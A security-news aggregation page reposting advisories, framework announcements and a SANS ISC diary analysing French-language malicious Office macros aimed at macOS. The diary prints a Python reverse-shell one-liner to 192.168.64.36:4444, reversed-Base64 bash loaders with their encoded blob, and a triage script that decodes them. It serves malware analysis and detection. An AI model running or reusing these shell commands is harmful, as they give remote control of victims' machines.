Malware Devil

Monday, November 9, 2020

DEF CON 28 Safe Mode Ham Radio Village – Swissninja’s ‘The OSTRWERK Initiative’

Many thanks to DEF CON and the conference speakers for publishing their outstanding presentations, which originally appeared at the organization's DEF CON 28 Safe Mode conference and on the DEF CON YouTube channel. Enjoy!


The post DEF CON 28 Safe Mode Ham Radio Village – Swissninja’s ‘The OSTRWERK Initiative’ appeared first on Security Boulevard.


The post DEF CON 28 Safe Mode Ham Radio Village – Swissninja’s ‘The OSTRWERK Initiative’ appeared first on Malware Devil.



https://malwaredevil.com/2020/11/09/def-con-28-safe-mode-ham-radio-village-swissninjas-the-ostrwerk-initiative/?utm_source=rss&utm_medium=rss&utm_campaign=def-con-28-safe-mode-ham-radio-village-swissninjas-the-ostrwerk-initiative

Sharing the Myth

A few months ago, I announced the rebranding of the Apfell framework to Mythic, but the announcements don’t stop there. Over the next few months there will be a series of blogs talking about some of the cool features or agents of Mythic. One of Mythic’s coolest features is the ability to dynamically plug and play new Payload Types or C2 Profiles due to the Docker-ization of every component. The general Mythic services are shown in the traffic flow diagram below:

Mythic tries to be merely a framework in which the operator and developer have complete control over virtually every aspect of their agents. To that end, there should be an easy way for developers to host and manage new Payload Types and C2 Profiles on their own repositories, but still have them hook into Mythic. This has the added benefit of giving payload/C2 developers complete control over the update frequency of their projects without relying on pull requests from the main Mythic repository.

Mythic External Agents

In order to facilitate this process, I released a template repository called Mythic_External_Agent (https://github.com/its-a-feature/Mythic_External_Agent). This repository provides container folders for a Payload Type, C2 Profiles, Agent icons, and corresponding documentation folders.

To leverage this project, simply fork the Mythic_External_Agent repository (or recreate the folder and file structure in your own repository).

The config.json file allows you to customize which components you want to import into your Mythic instance. You might be wondering why you wouldn’t want to just import everything or how things would even work if you didn’t. That’s due to another one of Mythic’s features — your Payload Type and C2 Profile “container” can be Docker, a VM, or any other host.

The Mythic documentation website has instructions on how to turn a VM or a physical host into a Mythic-compatible “container”. This is useful for situations where your agent has very strict requirements for tasking or payload creation that are too much of a hassle (or impossible) to do within Docker. A few examples where this comes to mind:

  • The language or desired output format doesn’t work within Docker
  • Setting up the proper toolchains/environments/SDKs to compile for a specific OS (such as macOS or a specific Linux distribution) is impossible or extremely difficult inside a Linux Docker container
  • The compilation requires extra steps with sensitive components that need to be contained to one system (such as developer certs for code signing)
  • You want to free up system resources for compilation or intensive tasks

Installing an External Agent

Mythic includes a special installer script you can run to remotely fetch and install agents. Simply point it to your repository via ./install_agent_from_github.sh https://github.com/path/to/repo and Mythic will clone it down into a temporary directory called temp, parse the config.json to see which folders to copy out to the right locations, then remove the temp folder. At this point, you can do one of two things to get everything up and going:

  • Restart Mythic with sudo ./start_mythic.sh and all of the new Payload Types and C2 Profiles will automatically be pulled in
  • Manually start each Payload Type via sudo ./start_payload_types.sh Agentname and each C2 Profile via sudo ./start_c2_profiles.sh C2Name.

That’s it. All of an agent’s components should now be set up for your Mythic agent.

Mythic Agent Collections

With the external agent capability, developers are able to host their custom agents on any repository that’s git-based (GitHub, BitBucket, GitLab, etc), and are able to do it under their own account. However, this can make it easy to miss agents that exist and lose track of everybody’s amazing work. To help make things easier to find, there is now a MythicAgents organization on GitHub. If you have an agent you would like included with the organization, reach out on Twitter to its_a_feature_ or in the Bloodhound Slack (#mythic channel) and we can get you added. You are still in full control of your agent, but having them in a central group benefits everybody.

The first addition to this collection is Dwight Hohnstein’s Apollo agent.

Apollo is a Windows agent written in C# on .NET Framework 4.0 and designed for SpecterOps training offerings. Be sure to check out Dwight's upcoming free SO-CON talk all about Apollo.

If you're interested in making your own agent, I recommend attending the free SO-CON workshop on how to do it within two hours.

Everything for the Hercules agent will be hosted in the MythicAgents organization as well.


Sharing the Myth was originally published in Posts By SpecterOps Team Members on Medium, where people are continuing the conversation by highlighting and responding to this story.




https://malwaredevil.com/2020/11/09/sharing-the-myth/?utm_source=rss&utm_medium=rss&utm_campaign=sharing-the-myth

Lock and Code S1Ep19: Forecasting IoT cybersecurity with John Donovan and Adam Kujawa

This week on Lock and Code, we offer something special for listeners—a backstage pass to a cybersecurity training that we held for employees during Cybersecurity Awareness Month, which ended in October.

The topic? The future of cybersecurity for the Internet of Things.

Our guests, Chief Information Security Officer John Donovan and Adam Kujawa, Security Evangelist and a Director of Malwarebytes Labs, guide us through some of the future's most pressing questions. Will we ever run antivirus software on IoT devices? What predictions can we make for how the cybersecurity industry will respond to the next possible big IoT attack? And what can we do today to stay safe?

This episode was recorded live in front of our fellow Malwarebytes employees (over Zoom, of course, as is tradition during the coronavirus pandemic). The episode even includes a Q&A with our employees.

Tune in to get a glimpse into how Malwarebytes helped its own employees during Cybersecurity Awareness Month, on the latest episode of Lock and Code, with host David Ruiz.

You can also find us on the Apple iTunes store, Google Play Music, and Spotify, plus whatever podcast platform you prefer.


Stay safe, everyone!

The post Lock and Code S1Ep19: Forecasting IoT cybersecurity with John Donovan and Adam Kujawa appeared first on Malwarebytes Labs.




https://malwaredevil.com/2020/11/09/lock-and-code-s1ep19-forecasting-iot-cybersecurity-with-john-donovan-and-adam-kujawa-3/?utm_source=rss&utm_medium=rss&utm_campaign=lock-and-code-s1ep19-forecasting-iot-cybersecurity-with-john-donovan-and-adam-kujawa-3



The Joy of Tech® ‘Congrats America’

via the Comic Noggins of Nitrozac and Snaggy at The Joy of Tech® !


The post The Joy of Tech® ‘Congrats America’ appeared first on Security Boulevard.




https://malwaredevil.com/2020/11/09/the-joy-of-tech-congrats-america/?utm_source=rss&utm_medium=rss&utm_campaign=the-joy-of-tech-congrats-america

5 Reasons Why Web Security Is Important to Avoid Ransomware

In the world of IT security in general, 2020 so far could be called the year of ransomware. The news is full of reports of new ransomware attacks and based on the trends so far, we can expect the situation to keep getting worse. Many…


The post 5 Reasons Why Web Security Is Important to Avoid Ransomware appeared first on Acunetix.

The post 5 Reasons Why Web Security Is Important to Avoid Ransomware appeared first on Security Boulevard.




https://malwaredevil.com/2020/11/09/5-reasons-why-web-security-is-important-to-avoid-ransomware/?utm_source=rss&utm_medium=rss&utm_campaign=5-reasons-why-web-security-is-important-to-avoid-ransomware

Using Cloud Costs to Find Your Crown Jewels


Looking at overall cloud spend can be a common measurement for comparison when determining where your crown jewels data reside. The first step to securing your infrastructure is understanding what assets need to be secured. Data classification is the process of organizing data into categories so it is simple to identify, store, retrieve and protect…

The post Using Cloud Costs to Find Your Crown Jewels appeared first on Security Boulevard.




https://malwaredevil.com/2020/11/09/using-cloud-costs-to-find-your-crown-jewels/?utm_source=rss&utm_medium=rss&utm_campaign=using-cloud-costs-to-find-your-crown-jewels

Windows 10, iOS, Chrome, Firefox and Others Hacked at Tianfu Cup Competition

Multiple software products from Adobe, Apple, Google, Microsoft, Mozilla, and Samsung were successfully pwned with previously unseen exploits in Tianfu Cup 2020, the third edition of the international cybersecurity contest held in the city of Chengdu, China.
“Many mature and hard targets have been pwned on this year’s contest,” the event organizers said. “11 out of 16 targets cracked with 23



https://malwaredevil.com/2020/11/09/windows-10-ios-chrome-firefox-and-others-hacked-at-tianfu-cup-competition-2/?utm_source=rss&utm_medium=rss&utm_campaign=windows-10-ios-chrome-firefox-and-others-hacked-at-tianfu-cup-competition-2


The Limitations of SASE and Zero Trust

While SASE and Zero Trust work well for applications where it’s easy to identify valid users, these frameworks fail to address two specific areas of concern.

The post The Limitations of SASE and Zero Trust appeared first on K2io.

The post The Limitations of SASE and Zero Trust appeared first on Security Boulevard.




https://malwaredevil.com/2020/11/09/the-limitations-of-sase-and-zero-trust/?utm_source=rss&utm_medium=rss&utm_campaign=the-limitations-of-sase-and-zero-trust

How Attackers Brush Up Their Malicious Scripts, (Mon, Nov 9th)

On Friday, I received a bunch of alerts from one of my YARA hunting rules. Several samples were submitted from the same account (through the VT API), from the same country (US), and in a very short period of time. All the submitted files were OLE2 files containing a malicious macro. All of them had a low VT score, so they deserved some investigation. I downloaded the samples and had a look at them.

Indeed, all the OLE2 files contained the same set of auto-execute entry points (the procedure names Word and Excel run automatically when a document is opened), each of them simply calling Main():

sub Autoexec()
    Call Main
End Sub

Sub Auto_Open()
    Call Main
End Sub

Sub AutoOpen()
    Call Main
End Sub

Sub Workbook_Open()
    Call Main
End Sub

I extracted the VBA code via oledump and reviewed them chronologically (based on the upload time on VT). Here is the first version of the macro:

Private Sub Main()
  Shell ("python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((""192.168.64.36"",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([""/bin/bash"",""-i""]);'")
End Sub

Nothing fancy: a Python one-liner that connects back to 192.168.64.36:4444, duplicates the socket onto stdin, stdout and stderr, and spawns an interactive /bin/bash on it, i.e. a classic reverse shell. The Python code and /bin/bash point to a Unix-like target rather than Windows, which indicates that the macro is used in a targeted attack. Same remark for the RFC 1918 IP address. The port used (4444) probably indicates that the attacker is working from a Kali host.

Then, the attacker added a notification popup (for debugging purposes?):

Private Sub Main()
    Shell ("python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((""192.168.64.36"",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([""/bin/bash"",""-i""]);'")
    Shell ("osascript -e 'display notification ""Macro execut<8e>e"" with title ""Microsoft Word"" '")
End Sub

‘osascript’ is the macOS tool that runs OSA scripts (AppleScript, JavaScript, etc.)[1]. We learned something new about the target: it is a macOS device, and the attacker speaks French. The <8e> byte in the notification text is “é” in the Mac OS Roman encoding, so the message reads “Macro executée”. We also have this string in the OLE2 file:

Attribute VB_Name = "Feuil1"

“Feuil1” is the default name of the first worksheet in a French-localised Excel (“feuille” means “sheet”). So both the module name and the displayed notification are in French.

Then the attacker tried another technique: storing the payload in the document's comments property and executing whatever it contains:

Private Sub Main()
    Dim sc As String
    sc = ActiveDocument.BuiltInDocumentProperties("comments").Value
    Shell (sc)
End Sub

The next step was to obfuscate the payload: Base64-encode it, then reverse the resulting string. At runtime the macro drops the first 10 characters of the comment (Right() keeps everything after them), undoes the transformation with rev and base64 -D, and pipes the result into bash. Note that -D (uppercase) is the decode flag of the BSD base64 shipped with macOS; GNU coreutils uses -d. That is one more hint that the attacker is targeting macOS.

Private Sub Main()
    Dim sc As String
    sc = ActiveDocument.BuiltInDocumentProperties("comments").Value
    sc = Right(sc, Len(sc) - 10)
    Shell ("echo """ & sc & """|rev|base64 -D|bash")
End Sub

Another version of the same technique:

Private Sub Main()
    Dim sc As String
    sc = ActiveDocument.BuiltInDocumentProperties("comments").Value
    Shell ("echo """ & sc & """|rev|base64 -D|bash")
End Sub

The next one is funnier: the attacker used the text-to-speech capability of macOS through the ‘say’ command. Reversing “KEDI5F2c” gives “c2F5IDEK”, which Base64-decodes to “say 1” followed by a newline, so the Mac simply speaks the word “one”.

Private Sub Main()
    Shell ("echo ""KEDI5F2c""|rev|base64 -D|bash")
    Shell ("osascript -e 'display notification ""Macro execut<8e>e"" with title ""Microsoft Word"" '")
End Sub

And finally the latest version found with the Base64 data directly available in the macro:

Private Sub Main()
    Shell ("echo ""gCnsTKdJSatICLig2chJ2LulmYvIyWowGbhNmLzNXZj9mcwJWdz1Dc7kiMskCKv5WZslmZuMHKyAXdk5ycvByOpEDLpgybuVGbpZmLzhiMwVHZuM3bgsTKwwSKo8mblxWam5ycoIDc1RmLz92OpkCN0QDNsIiNz4CN24CO2EjLykTMigCK0NWZu52bj5yc7kSTBVkUUN1XLN0TT5Cdlt2YvNHLUVkTJ9lRB5Cdlt2YvNHK0V2aj92cuQXZrN2bz1zc7M3bsM3clN2byBnY1NHL0V2aj92cgQncvBXbpdCIj1CIu9Ga0lHc""|rev|base64 -D|bash")
    Shell ("osascript -e 'display notification ""Macro execut<8e>e"" with title ""Microsoft Word"" '")
End Sub

Reversed and Base64-decoded, the blob yields exactly the Python reverse shell of the first version (same IP address, same port). Note that the blob as printed above is 310 characters long, which is not a multiple of 4, so its two trailing “=” padding characters are missing; a strict decoder has to restore them before decoding.
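To make the decoding above repeatable, here is an added Python triage helper (example code written for this page, not part of the diary, of oledump or of any other tool mentioned). It pulls the Shell() command strings out of VBA source, undoes the rev|base64 -D stage with the padding restored, and extracts the connect-back host and port from the recovered Python reverse shell. The sample macro is constructed from the diary's versions (the short “say 1” loader in place of the long blob), the long Base64 blob is copied from the last version above, and the regexes only handle plain string literals passed to Shell(), not the concatenated form used in the comments-property versions.

```python
import base64
import re

# Procedure names Word/Excel run automatically when a document opens.
AUTO_EXEC_NAMES = {"autoexec", "autoopen", "auto_open", "workbook_open", "document_open"}

SUB_RE = re.compile(r"^\s*(?:Private\s+|Public\s+)?Sub\s+(\w+)\s*\(", re.I | re.M)
# A plain VBA string literal passed to Shell(); a doubled "" inside it is an escaped quote.
SHELL_RE = re.compile(r'Shell\s*\(\s*"((?:[^"]|"")*)"', re.I)
# The loader shape seen in the diary: echo "<blob>"|rev|base64 -D|bash
REV_B64_RE = re.compile(r'echo\s+"([A-Za-z0-9+/=]+)"\s*\|\s*rev\s*\|\s*base64\s+-[dD]\s*\|\s*(?:ba)?sh')
# s.connect(("192.168.64.36",4444)) inside the recovered Python reverse shell
CONNECT_RE = re.compile(r'connect\(\(\s*"([^"]+)"\s*,\s*(\d+)\s*\)\)')


def decode_rev_b64(blob):
    """Undo `rev | base64 -D`: reverse the string, then Base64-decode it.
    The '=' padding may be absent (the blob on the page has none), so restore it."""
    s = blob.strip()[::-1]
    s += "=" * (-len(s) % 4)
    return base64.b64decode(s).decode("utf-8", errors="replace")


def find_entry_points(vba):
    """Names of the auto-execute procedures defined in the macro source."""
    return [name for name in SUB_RE.findall(vba) if name.lower() in AUTO_EXEC_NAMES]


def find_shell_commands(vba):
    """Command strings passed to Shell(), with VBA's "" quote escaping undone."""
    return [lit.replace('""', '"') for lit in SHELL_RE.findall(vba)]


def extract_c2(payload):
    """(host, port) of the connect-back, or None if the payload is not that shape."""
    m = CONNECT_RE.search(payload)
    return (m.group(1), int(m.group(2))) if m else None


def triage(vba):
    """Static triage of one macro: entry points, commands, decoded payloads, C2, macOS hints."""
    cmds = find_shell_commands(vba)
    decoded = [decode_rev_b64(b) for c in cmds for b in REV_B64_RE.findall(c)]
    c2 = [ep for ep in (extract_c2(p) for p in decoded) if ep]
    hints = [s for s in cmds + decoded
             if "osascript" in s or "base64 -D" in s or s.startswith("say ")]
    return {
        "entry_points": find_entry_points(vba),
        "shell_commands": cmds,
        "decoded_payloads": decoded,
        "c2": c2,
        "macos_indicators": hints,
    }


# Constructed sample (not a file from the diary): the last macro version with the
# short "say 1" loader from the previous version, so the decoded output stays short.
SAMPLE_VBA = '''
Sub AutoOpen()
    Call Main
End Sub

Private Sub Main()
    Shell ("echo ""KEDI5F2c""|rev|base64 -D|bash")
    Shell ("osascript -e 'display notification ""Macro executee"" with title ""Microsoft Word"" '")
End Sub
'''

# The reversed Base64 blob exactly as printed in the diary's last version (310 chars, no padding).
DIARY_BLOB = (
    "gCnsTKdJSatICLig2chJ2LulmYvIyWowGbhNmLzN"
    "XZj9mcwJWdz1Dc7kiMskCKv5WZslmZuMHKyAXdk5"
    "ycvByOpEDLpgybuVGbpZmLzhiMwVHZuM3bgsTKww"
    "SKo8mblxWam5ycoIDc1RmLz92OpkCN0QDNsIiNz4"
    "CN24CO2EjLykTMigCK0NWZu52bj5yc7kSTBVkUUN"
    "1XLN0TT5Cdlt2YvNHLUVkTJ9lRB5Cdlt2YvNHK0V"
    "2aj92cuQXZrN2bz1zc7M3bsM3clN2byBnY1NHL0V"
    "2aj92cgQncvBXbpdCIj1CIu9Ga0lHc"
)

if __name__ == "__main__":
    for key, value in triage(SAMPLE_VBA).items():
        print(f"{key}: {value}")
    payload = decode_rev_b64(DIARY_BLOB)
    print("diary blob decodes to:", payload.strip())
    print("connect-back:", extract_c2(payload))
```

The padding fix is the detail that matters in practice: `base64 -D` on the attacker's Mac evidently accepted the unpadded string, but Python's decoder raises “Incorrect padding” on it, so the reversed string is padded to a multiple of four before decoding.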

Based on all those findings, we can probably conclude that the attacker is preparing a macro to compromise a macOS user. Another red-team exercise on its way?

[1] https://osxdaily.com/2016/08/19/run-applescript-command-line-macos-osascript/

Xavier Mertens (@xme)
Senior ISC Handler – Freelance Cyber Security Consultant
PGP Key

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.



https://malwaredevil.com/2020/11/09/how-attackers-brush-up-their-malicious-scripts-mon-nov-9th/?utm_source=rss&utm_medium=rss&utm_campaign=how-attackers-brush-up-their-malicious-scripts-mon-nov-9th

3 Takeaways from Sandworm Hacker Group’s Indictment 

Sandworm

The U.S. Department of Justice officially revealed in October what it said were a number of instances of Russian government-sponsored hacking when it formally indicted six members and officers of Russia's military intelligence agency, the Main Intelligence Directorate (GRU). In addition to naming the members of the hacker group, it was also the first time the U.S…

The post 3 Takeaways from Sandworm Hacker Group’s Indictment  appeared first on Security Boulevard.




https://malwaredevil.com/2020/11/09/3-takeaways-from-sandworm-hacker-groups-indictment/?utm_source=rss&utm_medium=rss&utm_campaign=3-takeaways-from-sandworm-hacker-groups-indictment


Body Found in Canada Identified as Neo-Nazi Spam King

The body of a man found shot inside a burned out vehicle in Canada three years ago has been identified as that of Davis Wolfgang Hawke, a prolific spammer and neo-Nazi who led a failed anti-government march on Washington, D.C. in 1999, according to news reports.

Homicide detectives said they originally thought the man found June 14, 2017 in a torched SUV on a logging road in Squamish, British Columbia was a local rock climber known to others in the area as a politically progressive vegan named Jesse James.

Davis Wolfgang Hawke. Image: Spam Kings, by Brian McWilliams.

But according to a report from CTV News, at a press conference late last month authorities said new DNA evidence linked to a missing persons investigation has confirmed the man’s true identity as Davis Wolfgang Hawke.

A key subject of the book Spam Kings by Brian McWilliams, Hawke was a Jewish-born American who’d legally changed his name from Andrew Britt Greenbaum. For many years, Hawke was a big time purveyor of spam emails hawking pornography and male enhancement supplements, such as herbal Viagra.

Hawke had reportedly bragged about the money he earned from spam, but told friends he didn’t trust banks and decided to convert his earnings into gold and platinum bars. That sparked rumors that he had possibly buried his ill-gotten gains on his parents’ Massachusetts property.

In 2005, AOL won a $12.8 million lawsuit against him for relentlessly spamming its users. A year later, AOL won a court judgment authorizing them to dig on that property, although no precious metals were ever found.

More recently, Hawke’s Jesse James identity penned a book called Psychology of Seduction, which claimed to merge the “shady world of the pickup artist with modern science, unraveling the mystery of attraction using evolutionary biology and examining seduction through the lens of social and evolutionary psychology.”

The book’s “about the author” page said James was a “disruptive technology pioneer” who was into rock climbing and was a resident of Squamish. It also claimed James held a PhD in theoretical physics from Stanford, and that he was an officer in the Israeli Defense Force.

It might be difficult to fathom why, but Hawke may have made a few enemies over the years. Spam Kings author McWilliams notes that Hawke changed his name with regularity and used many pseudonyms.

“I could definitely see this guy making someone so mad at him they’d want to kill him,” McWilliams told CTV. “He was a guy who really pushed people that way and was a crook. I mean, he was a conman. That was what he was and I can see how somebody might get mad. I can also see him staging his own death or committing suicide in a fashion like that, if that’s what he chose to do. He was just a perplexing guy. I still don’t feel like I have a handle on him and I spent the better part of a year trying to figure out what made him tick.”

The father of the deceased, Hy Greenbaum, has offered a $10,000 reward to any tipster who can help solve his son’s homicide. British Columbia’s Integrated Homicide Investigation Team also is seeking clues, and can be reached at ihitinfo@rcmp-grc.gc.ca.




https://malwaredevil.com/2020/11/09/body-found-in-canada-identified-as-neo-nazi-spam-king/?utm_source=rss&utm_medium=rss&utm_campaign=body-found-in-canada-identified-as-neo-nazi-spam-king

Creating Effective Cybersecurity Budgets

Building an effective and resilient organization on a limited budget is a major feat. When it comes to cybersecurity budgets, there are many aspects that must be considered. Fortunately, aligning with industry best practices and security frameworks brings some clarity to this challenge. In presenting the webcast “Everything […]…

The post Creating Effective Cybersecurity Budgets appeared first on The State of Security.

The post Creating Effective Cybersecurity Budgets appeared first on Security Boulevard.




https://malwaredevil.com/2020/11/09/creando-presupuestos-para-ciberseguridad-efectivos/?utm_source=rss&utm_medium=rss&utm_campaign=creando-presupuestos-para-ciberseguridad-efectivos

CISA Strategy for 5G Security and Resilience

In August 2020, the Cybersecurity and Infrastructure Security Agency (CISA) released its strategy to ensure the security and resilience of 5G infrastructure in the United States. Roughly every 10 years, the next generation of mobile communication networks is released, bringing faster speeds and increased capabilities. The fifth generation (5G) of wireless technology is a complete […]…

The post CISA Strategy for 5G Security and Resilience appeared first on The State of Security.

The post CISA Strategy for 5G Security and Resilience appeared first on Security Boulevard.




https://malwaredevil.com/2020/11/09/cisa-strategy-for-5g-security-and-resilience/?utm_source=rss&utm_medium=rss&utm_campaign=cisa-strategy-for-5g-security-and-resilience

ISC Stormcast For Monday, November 9th 2020 https://isc.sans.edu/podcastdetail.html?id=7244, (Mon, Nov 9th)

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.



https://malwaredevil.com/2020/11/09/isc-stormcast-for-monday-november-9th-2020-https-isc-sans-edu-podcastdetail-htmlid7244-mon-nov-9th/?utm_source=rss&utm_medium=rss&utm_campaign=isc-stormcast-for-monday-november-9th-2020-https-isc-sans-edu-podcastdetail-htmlid7244-mon-nov-9th

ESB-2020.3939 – [Debian] libexif: Execute arbitrary code/commands – Remote with user interaction

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256

===========================================================================
             AUSCERT External Security Bulletin Redistribution

                               ESB-2020.3939
                          libexif security update
                              9 November 2020

===========================================================================

        AusCERT Security Bulletin Summary
        ---------------------------------

Product:           libexif
Publisher:         Debian
Operating System:  Debian GNU/Linux
Impact/Access:     Execute Arbitrary Code/Commands -- Remote with User Interaction
Resolution:        Patch/Upgrade
CVE Names:         CVE-2020-0452  

Reference:         ESB-2020.3934

Original Bulletin: 
   http://www.debian.org/security/2020/dsa-4786

- --------------------------BEGIN INCLUDED TEXT--------------------

- -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

- - -------------------------------------------------------------------------
Debian Security Advisory DSA-4786-1                   security@debian.org
https://www.debian.org/security/                       Moritz Muehlenhoff
November 08, 2020                     https://www.debian.org/security/faq
- - -------------------------------------------------------------------------

Package        : libexif
CVE ID         : CVE-2020-0452

It was discovered that a boundary check in libexif, a library to parse
EXIF files, could be optimised away by the compiler, resulting in
a potential buffer overflow.

For the stable distribution (buster), this problem has been fixed in
version 0.6.21-5.1+deb10u5.

We recommend that you upgrade your libexif packages.

For the detailed security status of libexif please refer to
its security tracker page at:
https://security-tracker.debian.org/tracker/libexif

Further information about Debian Security Advisories, how to apply
these updates to your system and frequently asked questions can be
found at: https://www.debian.org/security/

Mailing list: debian-security-announce@lists.debian.org
- -----BEGIN PGP SIGNATURE-----

iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAl+oCFAACgkQEMKTtsN8
TjawTBAAvQ/VB+0Nlbd9plOAUFtse3jrtgALiAczERsAntbBUOQweblDS/xK21Ng
qlMaNpPspmMcbsLu+3kwKs8rO2sG5i50DkfyXYwshVENLLgG7jbvJ/LH1XLLKzPe
yazeKybNaH7zqiONr3q+45av8+dPeLjsjJjY9Up8wKM9Fkyh6VZqkgd14ixzTP4A
/qPl9cU1oz+XrAz9kml85Xbq61IiM+7fRJv2yUimYkWxPGHJf2xPp0o55KPPz6x9
Yl4EwAjU7AsAhc+BEKAx8xIFsEYdtq3Ym3EXd5UTQSIi9K2WqM+TbuLKFeWkysdF
YRz2yifQhIg4NRMMMKXP5JV/P6Kma91LvqHbU1ZN70V0Ts9SClZAvQene9npCuFa
fc98/KcilRofhpdKfPFMwf5LaNrytJcC9ue8enM+Xj/iLDM2S6AwNzEZAKv/liYP
hdAVbK9QETcobUe0jrLEubbmUqezMEl1s6GgqljqJOVkz1LHZZK/YvSUnhsXxkqA
MTqKuM7mJVbJsDEvgFa3BdGJuH1E4ya6x+TwJFw4DmJ+acXHZ+0k4/iuZwK/QloN
x26jdr25WjwRqp/vmTcxTYp5Sxl2zv3BRLh+EJasBbB58pIxYPAQzLnEIA8KmiGJ
SyNR3qoSPcN5kchT+IkS673zPFRGosyOYaDxKn2Z4a2bGnoMuVo=
=Yb9P
- -----END PGP SIGNATURE-----

- --------------------------END INCLUDED TEXT--------------------

You have received this e-mail bulletin as a result of your organisation's
registration with AusCERT. The mailing list you are subscribed to is
maintained within your organisation, so if you do not wish to continue
receiving these bulletins you should contact your local IT manager. If
you do not know who that is, please send an email to auscert@auscert.org.au
and we will forward your request to the appropriate person.

NOTE: Third Party Rights
This security bulletin is provided as a service to AusCERT's members.  As
AusCERT did not write the document quoted above, AusCERT has had no control
over its content. The decision to follow or act on information or advice
contained in this security bulletin is the responsibility of each user or
organisation, and should be considered in accordance with your organisation's
site policies and procedures. AusCERT takes no responsibility for consequences
which may arise from following or acting on information or advice contained in
this security bulletin.

NOTE: This is only the original release of the security bulletin.  It may
not be updated when updates to the original are made.  If downloading at
a later date, it is recommended that the bulletin is retrieved directly
from the author's website to ensure that the information is still current.

Contact information for the authors of the original document is included
in the Security Bulletin above.  If you have any questions or need further
information, please contact them directly.

Previous advisories and external security bulletins can be retrieved from:

        https://www.auscert.org.au/bulletins/

===========================================================================
Australian Computer Emergency Response Team
The University of Queensland
Brisbane
Qld 4072

Internet Email: auscert@auscert.org.au
Facsimile:      (07) 3365 7031
Telephone:      (07) 3365 4417 (International: +61 7 3365 4417)
                AusCERT personnel answer during Queensland business hours
                which are GMT+10:00 (AEST).
                On call after hours for member emergencies only.
===========================================================================
-----BEGIN PGP SIGNATURE-----
Comment: http://www.auscert.org.au/render.html?it=1967

iQIVAwUBX6jJYuNLKJtyKPYoAQigQw/+PwG4oEAlH9ux+uF3umO30E6qNf4T4/qy
eiEP5786mXhRAnTKrhob6wwehd+fyBaJKq841JZtMl/nQA7+prT4dWXOuIVHwwLs
YA80BuXpJx95wodOyiERiP1H3nEimFFaLSqPiU/ZfZzg3hYUY8OXvdV+JHzt+EtA
YInM9ky6PMUxbaPl/EVPRx8klf58pM4vh5y5ewSzJOPqXTRRW8ndbnoPLiMST9rY
G5WBiEl2fxdTg8Q0xPtXZZNgh19exRT2Om4ntmuKH1ig5SCfb5mRpREpEfKt/OLp
wqAEiDsMTiDigdL6ROe9V3pMzEkFDc7JJF3QD4L4bhj25MBEQUDKe3djZMz8TbFP
6Ar5ZLE5NTglbKL5Kl0/shmlyh5A4J/40zJ6rdKiwQkN0zQJTFrs73JNUyAZMbt2
wjf7Oe47lrKCmJlNe3Ko9yI8xZ30amJE/3krT7tgZPr4ztxL2XHWZjrVmu1gXLUm
5hnc8L58LhKdwdvP3HnmcXqH+LDljqdi16zYTIbD7BR0WIXB0FvbJZ/ukS0tUF4n
PDW80FEUOLhB9vBr3KvDvW6C035wA+zxbMjJc4zsStr4t648efFCZ6XoQ/iMbIoA
O47OG4MSKxhKdIUD3CXxSmjHLYMjSvgLsXQvEhxuM/pN7Ip/lOtgvjeKFDIUBEHD
nUOeUkapC7I=
=ICdB
-----END PGP SIGNATURE-----


The post ESB-2020.3939 – [Debian] libexif: Execute arbitrary code/commands – Remote with user interaction appeared first on Malware Devil.



https://malwaredevil.com/2020/11/09/esb-2020-3939-debian-libexif-execute-arbitrary-code-commands-remote-with-user-interaction/?utm_source=rss&utm_medium=rss&utm_campaign=esb-2020-3939-debian-libexif-execute-arbitrary-code-commands-remote-with-user-interaction

ESB-2020.3938 – [Debian] wordpress: Multiple vulnerabilities

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256

===========================================================================
             AUSCERT External Security Bulletin Redistribution

                               ESB-2020.3938
                         wordpress security update
                              9 November 2020

===========================================================================

        AusCERT Security Bulletin Summary
        ---------------------------------

Product:           wordpress
Publisher:         Debian
Operating System:  Debian GNU/Linux
Impact/Access:     Execute Arbitrary Code/Commands -- Remote/Unauthenticated      
                   Increased Privileges            -- Remote/Unauthenticated      
                   Cross-site Request Forgery      -- Remote with User Interaction
                   Denial of Service               -- Remote/Unauthenticated      
                   Cross-site Scripting            -- Remote with User Interaction
Resolution:        Patch/Upgrade
CVE Names:         CVE-2020-28040 CVE-2020-28039 CVE-2020-28038
                   CVE-2020-28037 CVE-2020-28036 CVE-2020-28035
                   CVE-2020-28034 CVE-2020-28033 CVE-2020-28032

Reference:         ESB-2020.3789

Original Bulletin: 
   http://www.debian.org/security/2020/dsa-4784

- --------------------------BEGIN INCLUDED TEXT--------------------

- -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

- - -------------------------------------------------------------------------
Debian Security Advisory DSA-4784-1                   security@debian.org
https://www.debian.org/security/                       Sebastien Delafond
November 06, 2020                     https://www.debian.org/security/faq
- - -------------------------------------------------------------------------

Package        : wordpress
CVE ID         : CVE-2020-28032 CVE-2020-28033 CVE-2020-28034 CVE-2020-28035 
                 CVE-2020-28036 CVE-2020-28037 CVE-2020-28038 CVE-2020-28039 
                 CVE-2020-28040
Debian Bug     : 971914 973562

Several vulnerabilities were discovered in WordPress, a web blogging
tool. They allowed remote attackers to run insecure deserialization,
embed spam, perform various Cross-Site Scripting (XSS) or Cross-Site
Request Forgery (CSRF) attacks, escalate privileges, run arbitrary
code, and delete arbitrary files.

For the stable distribution (buster), these problems have been fixed in
version 5.0.11+dfsg1-0+deb10u1.

We recommend that you upgrade your wordpress packages.

For the detailed security status of wordpress please refer to
its security tracker page at:
https://security-tracker.debian.org/tracker/wordpress

Further information about Debian Security Advisories, how to apply
these updates to your system and frequently asked questions can be
found at: https://www.debian.org/security/

Mailing list: debian-security-announce@lists.debian.org
- -----BEGIN PGP SIGNATURE-----

iQEzBAEBCgAdFiEEAqSkbVtrXP4xJMh3EL6Jg/PVnWQFAl+lSYUACgkQEL6Jg/PV
